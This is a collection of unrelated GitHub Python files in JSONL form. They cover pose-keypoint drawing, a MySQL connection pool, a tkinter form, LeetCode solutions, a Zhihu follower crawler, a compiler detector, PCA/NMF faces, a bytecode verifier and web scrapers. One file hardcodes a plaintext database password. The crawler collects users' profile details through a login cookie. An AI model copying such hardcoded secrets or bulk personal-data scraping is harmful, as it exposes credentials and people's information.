cv2.RANSAC)\n\n crop_1 = cv2.warpPerspective(img_1_clr, homography, (width, height))\n crop_2 = img_2_clr\n\n return crop_1, crop_2\n","repo_name":"alexandraroots/post_stamps","sub_path":"image_registration.py","file_name":"image_registration.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"5926829549","text":"import os\nimport os.path as osp\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nimport random\nimport cv2\nimport argparse\nimport math\n\nimport tensorflow as tf\n\n# for tensorflow_cpn\nfrom config import cfg\nfrom dataset import Preprocessing\n\n# for keras_retinanet\nfrom keras_retinanet.utils.image import preprocess_image, resize_image\n\ndef draw_bounding_box(frame, person_dets):\n\n\tx, y, w, h = person_dets\n\n\ttop = max(0, np.floor(x + 0.5).astype(int))\n\tleft = max(0, np.floor(y + 0.5).astype(int))\n\tright = min(frame.shape[1], np.floor(x + w + 0.5).astype(int))\n\tbottom = min(frame.shape[0], np.floor(y + h + 0.5).astype(int))\n\n\tcv2.rectangle(frame, (top, left), (right, bottom), (255, 0, 0), 2)\n\n\ndef read_pb_return_tensors(graph, pb_file, return_elements):\n\n\twith tf.gfile.FastGFile(pb_file, 'rb') as f:\n\t\tfrozen_graph_def = tf.GraphDef()\n\t\tfrozen_graph_def.ParseFromString(f.read())\n\n\twith graph.as_default():\n\t\treturn_elements = tf.import_graph_def(frozen_graph_def,\n\t\t\t\t\t\treturn_elements=return_elements)\n\treturn return_elements\n\n\ndef crop(pose_img, person_dets):\n\n\t# cls_dets : x1, y1, x2, y2, score\n\tcls_dets = np.zeros((1, 4), dtype=np.float32)\n\t# test_data : x, y, w, h, score\n\ttest_data = np.zeros((1, 4), dtype=np.float32)\n\n\ttest_data[:] = person_dets[:]\n\n\tbbox = np.asarray(test_data[0])\n\tcls_dets[0, :4] = np.array([bbox[0], bbox[1], bbox[0] + bbox[2], bbox[1] + bbox[3]])\n\n\ttest_imgs = []\n\tdetails = []\n\n\t# cropping\n\ttest_img, detail = Preprocessing(pose_img, test_data[0], stage='test')\n\n\tdetails.append(detail)\n\n\tdetails = np.asarray(details).astype(np.float32)\n\n\tfeed = test_img\n\n\tdata = [feed.transpose(0, 2, 3, 1).astype(np.float32)]\n\n\treturn data, details\n\ndef keypoint_detection(res, details):\n\n\tflat = [0.0 for i in range(cfg.nr_skeleton * 2)]\n\tcls_skeleton = np.zeros((1, cfg.nr_skeleton, 3)).astype(np.float32)\n\tcrops = np.zeros((1, 4)).astype(np.float32)\n\n\tres = res.transpose(0, 3, 1, 2)\n\n\t# single map\n\tr0 = res[0].copy()\n\tr0 /= 255.\n\tr0 += 0.5\n\n\tfor w in range(cfg.nr_skeleton):\n\t\tres[0, w] /= np.amax(res[0, w])\n\tborder = 10\n\tdr = np.zeros((cfg.nr_skeleton, cfg.output_shape[0] + 2 * border, cfg.output_shape[1] + 2 * border))\n\tdr[:, border:-border, border:-border] = res[:cfg.nr_skeleton].copy()\n\n\tfor w in range(cfg.nr_skeleton):\n\t\tdr[w] = cv2.GaussianBlur(dr[w], (21, 21), 0)\n\tfor w in range(cfg.nr_skeleton):\n\t\tlb = dr[w].argmax()\n\t\ty, x = np.unravel_index(lb, dr[w].shape)\n\t\tdr[w, y, x] = 0\n\t\tlb = dr[w].argmax()\n\t\tpy, px = np.unravel_index(lb, dr[w].shape)\n\t\ty -= border\n\t\tx -= border\n\t\tpy -= border + y\n\t\tpx -= border + x\n\t\tln = (px ** 2 + py ** 2) ** 0.5\n\t\tdelta = 0.25\n\t\tif ln > 1e-3:\n\t\t\tx += delta * px / ln\n\t\t\ty += delta * py / ln\n\t\tx = max(0, min(x, cfg.output_shape[1] - 1))\n\t\ty = max(0, min(y, cfg.output_shape[0] - 1))\n\t\tcls_skeleton[0, w, :2] = (x * 4 + 2, y * 4 + 2)\n\t\tcls_skeleton[0, w, 2] = r0[w, int(round(y) + 1e-10), int(round(x) + 1e-10)]\n\n\t# map back to original images\n\tcrops[0, :] = details[0, :]\n\tfor w in range(cfg.nr_skeleton):\n\t\tcls_skeleton[0, w, 0] = cls_skeleton[0, w, 0] / cfg.data_shape[1] * (\n\t\t\t\t\tcrops[0][2] - crops[0][0]) + crops[0][0]\n\t\tcls_skeleton[0, w, 1] = cls_skeleton[0, w, 1] / cfg.data_shape[0] * (\n\t\t\t\t\tcrops[0][3] - crops[0][1]) + crops[0][1]\n\n\t# flat is keypoints(17)\n\tfor w in range(cfg.nr_skeleton):\n\t\tflat[w*2] = cls_skeleton[0, w, 0]\n\t\tflat[w*2+1] = cls_skeleton[0, w, 1]\n\n\treturn flat\n\ndef upper_detection(frame, flat, person_dets):\n\n\t# upper detection & lower keypoint remove\n\tupper = False\n\n\t\"\"\"\n\tlower keypoint remove using keypoint of hip, knee\n\n\tl_hip_y , r_hip_y : flat[23], flat[25] or cls_skeleton[0, 11, 1], cls_skeleton[0, 12, 1]\n\tl_knee_y, r_knee_y : flat[27], flat[29] or cls_skeleton[0, 13, 1], cls_skeleton[0, 14, 1]\n\n\t\"\"\"\n\n\tl_hip_y = flat[23]\n\tr_hip_y = flat[25]\n\t\n\tl_knee_y = flat[27]\n\tr_knee_y = flat[29]\n\n\tbbox_y = person_dets[1] + person_dets[3]\n\n\n\t# remove based on hip keypoint\n\thip_distance_r = r_hip_y - bbox_y\n\thip_distance_l = l_hip_y - bbox_y\n\n\t# remove based on knee keypoint \n\tknee_distance_r = r_knee_y - bbox_y\n\tknee_distance_l = l_knee_y - bbox_y\n\n\t# remove based on bounding box (frame.shape[0] = 720)\n\tbox_distance = bbox_y - frame.shape[0]\n\n\t\n\thip_distance_r = abs(hip_distance_r)\n\thip_distance_l = abs(hip_distance_l)\n\tknee_distance_r = abs(knee_distance_r)\n\tknee_distance_l = abs(knee_distance_l)\n\tbox_distance = abs(box_distance)\n\n\n\tif ((hip_distance_r < 110 and hip_distance_l < 110 and box_distance < 30) or (knee_distance_r < 50 and knee_distance_l < 50 and box_distance < 30)):\n\t\tupper = True\n\t\t\n\t\t# remove lower (knee, ankle) keypoint\n\t\tfor i in range(26, 34):\n\t\t\tflat[i] = 0.0\n\n\treturn flat, upper\n\n\ndef draw_skeleton(aa, kp, upper=False):\n\n\t#upper = False\n\n\tshow_skeleton_labels = False\n\n\tkp = np.array(kp).astype(int)\n\tkp = kp.reshape(17, 2)\n\n\tkp_names = ['nose', 'l_eye', 'r_eye', 'l_ear', 'r_ear', 'l_shoulder', \n\t\t\t'r_shoulder', 'l_elbow', 'r_elbow', 'l_wrist', 'r_wrist', \n\t\t\t'l_hip', 'r_hip', 'l_knee', 'r_knee', 'l_ankle', 'r_ankle']\n\n\tskeleton = [[16, 14], [14, 12], [17, 15], [15, 13], [12, 13], [6, 12], [7, 13], [6, 7], [6, 8], [7, 9], [8, 10], [9, 11], [2, 3], [1, 2], [1, 3], [2, 4], [3, 5], [4, 6], [5, 7]]\n\n\t# remove lower (knee, ankle) \n\tif upper :\n\t\tskeleton = skeleton[4:]\t\n\t\tkp_names = kp_names[:13]\n\t\tkp = kp[:13]\n\n\tfor i, j in skeleton:\n\t\tif kp[i-1][0] >= 0 and kp[i-1][1] >= 0 and kp[j-1][0] >= 0 and kp[j-1][1] >= 0 and \\\n\t\t\t(len(kp[i-1]) <= 2 or (len(kp[i-1]) > 2 and kp[i-1][2] > 0.1 and kp[j-1][2] > 0.1)):\n\t\t\tcv2.line(aa, tuple(kp[i-1][:2]), tuple(kp[j-1][:2]), (0,255,255), 2)\n\tfor j in range(len(kp)):\n\t\tif kp[j][0] >= 0 and kp[j][1] >= 0:\n\n\t\t\tif len(kp[j]) <= 2 or (len(kp[j]) > 2 and kp[j][2] > 1.1):\n\t\t\t\tcv2.circle(aa, tuple(kp[j][:2]), 2, tuple((0,0,255)), 2)\n\t\t\telif len(kp[j]) <= 2 or (len(kp[j]) > 2 and kp[j][2] > 0.1):\n\t\t\t\tcv2.circle(aa, tuple(kp[j][:2]), 2, tuple((255,0,0)), 2)\n\n\t\t\tif show_skeleton_labels and (len(kp[j]) <= 2 or (len(kp[j]) > 2 and kp[j][2] > 0.1)):\n\t\t\t\tcv2.putText(aa, kp_names[j], tuple(kp[j][:2]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 0))\n\n\n\n","repo_name":"eehoeskrap/tensorrt_cpn","sub_path":"Processing.py","file_name":"Processing.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15769509798","text":"import random\nimport numpy as np\nimport sys\n\nf = open('perturbations.txt', 'w')\nwith open(\"pfm_all.txt\") as handle:\n for m in motifs.parse(handle, \"jaspar\"):\n counts = m.counts\n values = list()\n ncol = len(counts[1,:])\n for x in range(0,ncol): \n for y in range(0,4):\n values.append(counts[y,x])\n new_counts = np.reshape(np.matrix(values), (4,ncol), order=\"F\")\n for x in range(0,ncol):\n for y in range(0,20):\n a = random.randint(0,3)\n b = random.randint(0,3)\n old_a = new_counts[a,x]\n old_b = new_counts[b,x]\n new_counts[a,x] = old_b\n new_counts[b,x] = old_a\n f.write(\">%s %s\\n\"%(m.matrix_id,m.name))\n for x in range(0,4):\n for y in range(0, ncol):\n f.write(str(int(new_counts[x,y])))\n f.write(\"\\t\")\n f.write(\"\\n\")\n\nf.close() \n","repo_name":"ReddyLab/TransversionsInRegElements","sub_path":"Perturb_motif_rows.py","file_name":"Perturb_motif_rows.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"26860199731","text":"from DBUtils.PooledDB import PooledDB\nimport pymysql\nPOOL = PooledDB(\n creator=pymysql, # 使用链接数据库的模块\n maxconnections=6, # 连接池允许的最大连接数,0或None表示不限制\n mincached=2, # 初始时链接池中至少创建的空闲链接,0表示不创建\n maxcached=5, # 链接池中最多闲置的链接,0或None表示不限制\n maxshared=3, # 链接池中最多共享的链接数据\n blocking=True, # 连接池中如果没有可用连接后是否阻塞等待。True 等待、False不等待报错\n maxusage=None, # 一个链接最多被重复使用的次数,None表示不限制\n setsession=[], # 会话前执行的命令列表\n ping=0, # 检查服务是否可用\n # pymysql 连接配置\n host=\"127.0.0.1\",\n user=\"lance\",\n password=\"LANCEyuan88\",\n database=\"codepy\",\n charset=\"utf8\"\n)\n\n\nclass DataBase(object):\n def conn(self):\n conn = POOL.connection()\n # cursor = conn.cursor(cursor=pymysql.cursors.DictCursor)\n cursor = conn.cursor()\n # cursor.execute(\"select * from app01_book\")\n return conn, cursor\n def get_one(self, sql, args):\n conn, cursor = self.conn()\n cursor.execute(sql, args)\n data = cursor.fetchone()\n cursor.close()\n conn.close()\n return data\n def get_all(self, sql, args):\n conn, cursor = self.conn()\n cursor.execute(sql, args)\n data = cursor.fetchall()\n cursor.close()\n conn.close()\n return data\n\n","repo_name":"LanceYuan/codepyFlask","sub_path":"DBpool.py","file_name":"DBpool.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"28956565151","text":"from tkinter import ttk\nfrom tkinter import *\n\n# (\"I Curso\")\n# (\"II Semestre\")\n# (\"III Su Nobre Completo\")\n# (\"IV Su Número De Carné\")\nclass Desk:\n def __init__(self, window):\n \n anchura = 1000 \n altura = 800\n \n self.wind = window\n\n self.wind.geometry(str(anchura)+'x'+str(altura))\n \n self.wind.columnconfigure(0, weight=1)\n \n self.wind.title('Examen Final')\n\n frame = LabelFrame(self.wind, text = 'Calificacion')\n frame.grid(row = 0, column = 0, columnspan = 3, pady = 20)\n \n Label(frame, text = 'Ingrese el primer numero: ').grid(row = 1, column = 0)\n \n self.var1 = Entry(frame)\n self.var1.focus()\n self.var1.grid(row = 1, column = 1)\n \n Label(frame, text = 'Ingrese el segundo numero: ').grid(row = 2, column = 0)\n self.var2 = Entry(frame)\n self.var2.grid(row = 2, column = 1)\n \n\n Label(frame, text = 'Ingrse el segundo numero: ').grid(row = 3, column = 0)\n self.var3 = Entry(frame)\n self.var3.grid(row = 3, column = 1)\n \n \n Button (frame, text = 'Iniciar', command = self.bottonR).grid(row = 6, columnspan = 5, sticky = W + E)\n Button (frame, text = 'Mostrar', command = self.bottonD).grid(row = 7, columnspan = 5, sticky = W + E)\n \n self.message = Label(text = '', fg = 'red')\n self.message.grid(row = 3, column = 0, columnspan = 2, sticky = W + E)\n\n \n def bottonR(self):\n a=float(self.var1.get())\n b=float(self.var2.get())\n c=float(self.var3.get())\n if (a 1\n# ⁠ B -> 2\n# ⁠ C -> 3\n# ⁠ ...\n# ⁠ Z -> 26\n# ⁠ AA -> 27\n# ⁠ AB -> 28\n# ⁠ ...\n#\n#\n# 示例 1:\n#\n# 输入: \"A\"\n# 输出: 1\n#\n#\n# 示例 2:\n#\n# 输入: \"AB\"\n# 输出: 28\n#\n#\n# 示例 3:\n#\n# 输入: \"ZY\"\n# 输出: 701\n#\n# 致谢:\n# 特别感谢 @ts 添加此问题并创建所有测试用例。\n#\n#\n\n\nclass Solution:\n def titleToNumber(self, s: str) -> int:\n res = 0\n for i in s:\n res = 26 * res + ord(i) - 64\n return res\n","repo_name":"ZodiacSyndicate/leet-code-solutions","sub_path":"easy/171.excel表列序号/171.excel表列序号.py","file_name":"171.excel表列序号.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"36"} +{"seq_id":"1161949159","text":"'''The program extracts values of student number and grade from\na .txt file (grades_program.txt) and creates a dictionary using these values'''\n\nimport tkinter.filedialog\n\ndef main():\n \n grade_file = open(tkinter.filedialog.askopenfilename())\n print (read_grades(grade_file))\n grade_file.close()\n \n \n\ndef read_grades(gradefile):\n\n \n ## skip over the header.\n line = gradefile.readline()\n while line != '\\n':\n line = gradefile.readline()\n \n\n ## Read the grades, accumulating them into a dict.\n grade_to_ids = {}\n line = gradefile.readline()\n\n while line != '':\n student_id = line[:4]\n grade = float(line[4:].strip())\n\n if grade not in grade_to_ids:\n grade_to_ids[grade] = [student_id]\n else:\n grade_to_ids[grade].append(student_id)\n \n line = gradefile.readline()\n\n return grade_to_ids\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"andrewbells/python_learning","sub_path":"coursera/populate_dict.py","file_name":"populate_dict.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"74494640103","text":"# -*- coding: utf-8 -*-\nimport requests\nfrom lxml import etree\nimport math\nimport json\nimport time\n\n\nclass Crawler(object):\n def get_page_html(self, url):\n \"\"\"\n 获取页面源码\n :param url:页面url\n :return: 页面源码\n \"\"\"\n if url:\n headers = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'\n '(KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36',\n 'cookie': 'cookie' # 这里填写你自己的登入的cookie\n }\n r = requests.get(url, headers=headers)\n print(\"正在获取{}的网页源码,状态码为{}\".format(url, r.status_code))\n # 爬取延时\n time.sleep(0.2)\n print(r.status_code)\n if r.status_code == 200:\n r.encoding = 'utf-8'\n return r.text\n return None\n\n def get_following_urls(self, userinfo_page_url, following_num):\n \"\"\"\n 根据用户主页拼接关注列表的url\n :param userinfo_page_url:\n :param following_num:\n :return:\n \"\"\"\n if not following_num:\n return None\n base_following_url = '/followees?include=data%5B*%5D.answer_count%2Carticles_count%2Cgender%2C' \\\n 'follower_count%2Cis_followed%2Cis_following%2Cbadge%5B%3F(type%3Dbest_answerer)%5' \\\n 'D.topics&offset={}&limit={}'\n page_nums = math.ceil(int(following_num.replace(',', '')) / 20)\n for i in range(int(page_nums)):\n following_url = userinfo_page_url.replace('people', 'api/v4/members') + base_following_url.format(i * 20, (\n i + 1) * 20)\n yield following_url\n\n def get_new_urls(self, following_json):\n \"\"\"\n 获取新的URL\n :param following_json:\n :return:\n \"\"\"\n if not following_json:\n return None\n # 解析返回的json数据\n base_url = 'https://www.zhihu.com'\n user_urls = []\n following_info_json = json.loads(following_json)\n items = following_info_json['data']\n for item in items:\n url_type = item['type']\n url_token = item['url_token']\n user_url = base_url + '/{}/{}'.format(url_type, url_token)\n print(\"爬取到新的用户链接:{}\".format(user_url))\n user_urls.append(user_url)\n return user_urls\n\n def get_userinfo(self, userinfo_url, user_page_html):\n \"\"\"\n 获取用户的详细信息\n :param userinfo_url:\n :param user_page_html:\n :return:\n \"\"\"\n if not user_page_html:\n return None\n print('正在爬取{}'.format(userinfo_url))\n user_page_html = etree.HTML(user_page_html)\n username = \"\".join(user_page_html.xpath('//span[@class=\"ProfileHeader-name\"]/text()'))\n follow_num = user_page_html.xpath(\n '//div[@class=\"NumberBoard FollowshipCard-counts NumberBoard--divider\"]//strong/text()')\n if not follow_num:\n return None\n following_num = follow_num[0]\n followers_num = follow_num[1]\n user_avatar_url = user_page_html.xpath('//img[@class=\"Avatar Avatar--large UserAvatar-inner\"]/@src')[0]\n userinfo_detail_items = user_page_html.xpath('//div[@class =\"ProfileHeader-infoItem\"]')\n if userinfo_detail_items:\n jobs = userinfo_detail_items[0].xpath('.//text()')\n if len(userinfo_detail_items) > 1:\n school = userinfo_detail_items[1].xpath('.//text()')\n else:\n school = []\n userinfo_detail = {\n 'jobs': jobs,\n 'school': school\n }\n else:\n userinfo_detail = []\n userinfo = {\n 'username': username,\n 'user_url': userinfo_url,\n 'following_num': following_num,\n 'followers_num': followers_num,\n 'user_avatar_url': user_avatar_url,\n 'userinfo_deail': userinfo_detail\n }\n print('爬取到用户信息:{}'.format(userinfo))\n return userinfo\n\n def main(self, userinfo_url):\n \"\"\"\n 主程序\n :param userinfo_url:\n :return:\n \"\"\"\n new_urls = []\n user_page_html = self.get_page_html(userinfo_url)\n if user_page_html:\n userinfo = self.get_userinfo(userinfo_url, user_page_html)\n if userinfo:\n following_urls = self.get_following_urls(userinfo_url, userinfo['following_num'])\n for following_url in following_urls:\n following_html = self.get_page_html(following_url)\n new_urls.extend(self.get_new_urls(following_html))\n return userinfo, new_urls\n return None, None\n\n\nif __name__ == '__main__':\n a = Crawler()\n a.main('https://www.zhihu.com/people/kmxz')\n","repo_name":"xieys/zhihu_spider","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"16009371781","text":"import re\nfrom utils.subprocess import get_output\n\n_command_candidate_patterns = ['clang(\\.exe)?$','clang-[A-Za-z0-9]*[0-9]+(\\.exe)?$', 'clang\\+\\+(\\.exe)?$', 'clang\\+\\+-[A-Za-z0-9]*[0-9]+(\\.exe)?$']\n_apple_llvm_pattern='Apple LLVM version ([0-9\\.]+)'\n_clangc2_pattern='clang with Microsoft CodeGen'\n_clang_version_pattern='clang version (\\d\\.\\d\\.\\d[^\\s]*)'\n\ndef _is_it_different_clang(output, patterns):\n for pattern in patterns:\n match = re.search(pattern, output)\n if match:\n return True\n return False\n\ndef _is_it_really_clang(command, patterns, out=None):\n for pattern in patterns:\n if re.search(pattern, command):\n output = get_output([command, \"--version\"])\n if not _is_it_different_clang(output, [_apple_llvm_pattern, _clangc2_pattern]):\n return True\n else:\n out.trace(\"[clng] {}: It is not vanilla Clang (e.g. Apple, or ClangC2). Aborting.\".format(command))\n return False\n\ndef _detect_clang_version(command, out=None):\n output = get_output([command, \"--version\"])\n match = re.search(_clang_version_pattern, output)\n if not match:\n out.warning(\"[clng] {}: could not find version string\".format(command))\n out.debug(\"[clng] {}: {}\".format(command, output))\n return \"unknown\"\n return match.group(1)\n\ndef _detect_clang(command, out=None):\n if not command:\n return None\n\n if not _is_it_really_clang(command, _command_candidate_patterns, out):\n if out:\n out.trace(\"[clng] {} is not Clang\".format(command))\n return None\n\n version=_detect_clang_version(command, out)\n out.info(\"[clng] {}: found Clang version {}\".format(command, version))\n\n options=[]\n meta = {\n \"tool\": \"clang\",\n \"path\": command,\n \"version\": version,\n \"options\": options\n }\n return meta\n\n\ndef run(command, out=None):\n ret = _detect_clang(command, out)\n if ret:\n return [ret]\n return None\n","repo_name":"unjello/findc","sub_path":"find_compiler/toolchain/matcher/clang/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"20550648548","text":"'''\nfit_transform(X):用X来训练PCA模型,同时返回降维后的数据。\ncomponents_不明白\n'''\nfrom numpy.random import RandomState\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import fetch_olivetti_faces\nfrom sklearn import decomposition\n\nn_row, n_col = 2, 3\nn_components = n_row * n_col\nimage_shape = (64, 64)\n\n###############################################################################\n# Load faces data\ndataset = fetch_olivetti_faces(shuffle=True, random_state=RandomState(0))\nfaces = dataset.data\n# (6,4096)\nprint(faces.shape)\n\n\n###############################################################################\ndef plot_gallery(title, images, n_col=n_col, n_row=n_row):\n # 子图 figsize(2*3,2.26*2) 生成图像的宽和长\n plt.figure(figsize=(2. * n_col, 2.26 * n_row))\n # 总图标题\n plt.suptitle(title, size=16)\n # 得到images 的序号和数据\n for i, comp in enumerate(images):\n # 第几个子图 subplot(2,3,1)\n plt.subplot(n_row, n_col, i + 1)\n vmax = max(comp.max(), -comp.min())\n # 显示子图,\n plt.imshow(comp.reshape(image_shape), cmap=plt.cm.gray,\n interpolation='nearest', vmin=-vmax, vmax=vmax)\n # 将子图的横纵坐标去掉\n plt.xticks(())\n plt.yticks(())\n plt.subplots_adjust(0.01, 0.05, 0.99, 0.94, 0.04, 0.)\n\n\nplot_gallery(\"First centered Olivetti faces\", faces[:n_components])\n###############################################################################\n\nestimators = [\n ('Eigenfaces - PCA using randomized SVD',\n decomposition.PCA(n_components=6, whiten=True)),\n\n ('Non-negative components - NMF',\n decomposition.NMF(n_components=6, init='nndsvda', tol=5e-3))\n]\n\n###############################################################################\n\nfor name, estimator in estimators:\n print(\"Extracting the top %d %s...\" % (n_components, name))\n print(faces.shape)\n estimator.fit(faces)\n # 是W\n components_ = estimator.components_\n print('components_[:6].shape:')\n print(components_[:6].shape)\n # print(components_[:,n_components].shape)\n plot_gallery(name, components_[:n_components])\n\n# plt.show()\n","repo_name":"dpp1013/Sklearn_ML","sub_path":"NMF.py","file_name":"NMF.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"72170636585","text":"import requests\nfrom lxml import etree\nimport re\n\nurl = \"https://ssr1.scrape.center\"\nhtml = requests.get(url).text\n\n\nroot = etree.HTML(html)\n\nxpath = \"//img/@src\"\nimgs = root.xpath(xpath)\n\ni = 1\nfor imgPlace in imgs:\n if re.match(\"^h.*\", str(imgPlace)):\n print(imgPlace)\n response = requests.get(imgPlace)\n print(response.content)\n # 将图片内容保存到本地文件\n with open(\"../data/imgdata/SSR1_{}.jpg\".format(i), \"wb\") as f:\n f.write(response.content)\n print(\"图片已保存\")\n i += 1\n\n","repo_name":"cumin1/SpiderStudyCode","sub_path":"xpath_mate/SSR1.py","file_name":"SSR1.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"3458633407","text":"class Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n dic = {} # '1'-> a\n for i in range(1, 27):\n dic[str(i)] = chr( i + ord('a') )\n\n f = [[ 0 for j in range(2)] for i in range(len(s) + 1)]\n for i in range( 1, len(s) + 1 ):\n if i == 1:\n f[i][0] = 1 if s[i - 1] in dic else 0\n else:\n if s[i-1:i] in dic:\n f[i][0] = max(f[i-1][0], f[i-1][1])\n if s[i-2:i] in dic:\n f[i][1] = max(f[i-2][0], f[i-2][1])\n\n\n return f[-1]\n\nclass Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 1\n f = [0] * len(s)\n\n dic = {} # '1'-> a\n for i in range(1, 27):\n dic[str(i)] = chr(i + ord('a'))\n\n f = [0] * (len(s) + 1)\n f[0] = 1\n\n for i in range(1, len(s) + 1):\n f[i] = 0\n if ord('1') <= ord(s[i-1]) and ord(s[i-1]) <= ord('9'):\n f[i] += f[i - 1]\n\n if i > 1:\n j = 10 * ( ord(s[i-2]) - ord('0') ) + ord(s[i-1]) - ord('0')\n if 10 <= j and j <= 26:\n f[i] += f[i - 2]\n\n return f[-1]\n\n\nclass Solution(object):\n def numDecodings(self, s):\n \"\"\"\n 转移方程:\n 对于一个digit满足1-9时,f[i] = f[i-1]\n 对于连续的两个字母满足10-24时, f[i] = f[i-1] + f[i-2]\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 0\n\n f = [0] * (len(s) + 1)\n\n f[0] = 1 #创建这个初始条件,主要是因为方便转移方程\n for i in range(1, len(s) + 1):\n temp = ord(s[i-1]) - ord('0')\n if temp > 0 and temp < 10:\n f[i] = f[i-1]\n if i > 1:\n temp = 10 * ( ord(s[i-2]) - ord('0') ) + ( ord(s[i-1]) - ord('0') )\n if 10 <= temp and temp <= 26:\n f[i] += f[i - 2]\n\n return f[-1]\n\n\n\n\nif __name__ == '__main__':\n # s = \"12\"\n # s = \"226\"\n # s = \"0\"\n # s = \"012\"\n # s = \"1\"\n s = \"10\"\n\n\n print(Solution().numDecodings(s))\n","repo_name":"pi408637535/Algorithm","sub_path":"com/study/algorithm/daily/91. Decode Ways.py","file_name":"91. Decode Ways.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"3184471231","text":"# -*- coding: utf8 -*-\n\nfrom ..instructions import InsReturn, InsGoto, InsBranch\nfrom .. import opcodes\nfrom ..exceptions import VerifyException\nfrom .frame import Frame\nfrom .controlflow import ControlFlowAnalyzer\n\n\nclass Verifier():\n\n def __init__(self, interpreter):\n self.interpreter = interpreter\n self.changed = None\n self.frames = None\n self.queue = []\n self.method = None\n\n def verify(self, method):\n self.verify_jump_points(method)\n self.verify_load_store_vars(method)\n self.verify_return(method)\n self.verify_values(method)\n return True\n\n def verify_jump_points(self, method):\n for i, inst in enumerate(method.code):\n if inst.opcode == opcodes.GOTO or isinstance(inst, InsBranch):\n if inst.argument.value < 0 or inst.argument.value >= len(method.code):\n raise VerifyException('instruction %s jump target %s outside boundary <0, %s>' %\n (inst, inst.argument.value, len(method.code) - 1))\n return True\n\n def verify_load_store_vars(self, method):\n for inst in method.code:\n if inst.opcode in [opcodes.ISTORE, opcodes.FSTORE, opcodes.ASTORE]:\n pos = inst.argument.value\n lv = method.variables[pos]\n vt = self.interpreter.new_value(lv.vtype)\n self.interpreter.copy_operation(inst, vt)\n return True\n\n def verify_return(self, method):\n cfa = ControlFlowAnalyzer()\n bbs = cfa.analyze(method)\n for bb in bbs:\n end_ins = method.code[bb.end_inst_index]\n if not bb.sucessors and not isinstance(end_ins, InsReturn):\n raise VerifyException('leaf basic block does not end with return instruction, but wirh %s' % end_ins)\n return True\n\n def verify_values(self, method):\n self.method = method\n self.changed = [False for _ in method.code]\n self.frames = [None for _ in method.code]\n\n current = Frame()\n current.set_return(self.interpreter.new_value(method.return_type.vtype))\n\n for i, v in enumerate(method.variables):\n if i < method.argument_count:\n current.add_local(self.interpreter.new_value(v.vtype))\n else:\n current.add_local(self.interpreter.new_value(None))\n current.add_local_type(self.interpreter.new_value(v.vtype))\n\n self.merge(0, current)\n\n while self.queue:\n ins_int = self.queue.pop()\n ins = method.code[ins_int]\n frame = self.frames[ins_int]\n self.changed[ins_int] = False\n\n current = frame.copy()\n current.execute(ins, self.interpreter)\n if not isinstance(ins, InsReturn) and not isinstance(ins, InsGoto):\n self.merge(ins_int + 1, current)\n\n if isinstance(ins, InsGoto) or isinstance(ins, InsBranch):\n self.merge(ins.argument.value, current)\n\n return True\n\n def merge(self, i, frame):\n old_frame = self.frames[i]\n changes = False\n\n if old_frame is None:\n self.frames[i] = frame.copy()\n changes = True\n else:\n changes = old_frame.merge(frame, self.interpreter)\n\n if changes and not self.changed[i]:\n self.changed[i] = True\n self.queue.append(i)\n","repo_name":"lukleh/Tiny-Stackbased-Virtual-Machine-in-Python","sub_path":"TSBVMIP/analysis/verifier.py","file_name":"verifier.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"} +{"seq_id":"26771792719","text":"import requests\nfrom fake_useragent import UserAgent\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n\ndef link():\n url = 'https://kugoo-samokat.ru/elektrosamokat-kugoo-s3#!/tab/333312074-2'\n res = requests.get(url, headers={'User-Agent': UserAgent().chrome})\n html = res.content\n soup = BeautifulSoup(html, 'html.parser')\n name = soup.find('h1', attrs={'class': 'js-product-name'}).text\n\n d = {\n 'Категория': 'Электросамокаты',\n 'Цвет': 'черный',\n 'Бренд': 'Kugoo',\n 'Пол': '',\n 'Название': soup.find('h1', attrs={'class': 'js-product-name'}).text,\n 'Артикул товара': '0001',\n 'Баркод товара': '0001',\n 'Цена': soup.find('div', attrs={'class': 't762__price-value'}).text,\n 'Состав': '',\n 'Описание': '',\n 'Гарантийный срок': '1 год',\n 'Время зарядки': soup.find('div', attrs={'field': 'tn_text_1610137288297'}).text,\n 'Максимальная скорость': soup.find('div', attrs={'field': 'tn_text_1610130533629'}).text,\n 'Питание': 'от аккумулятора'\n 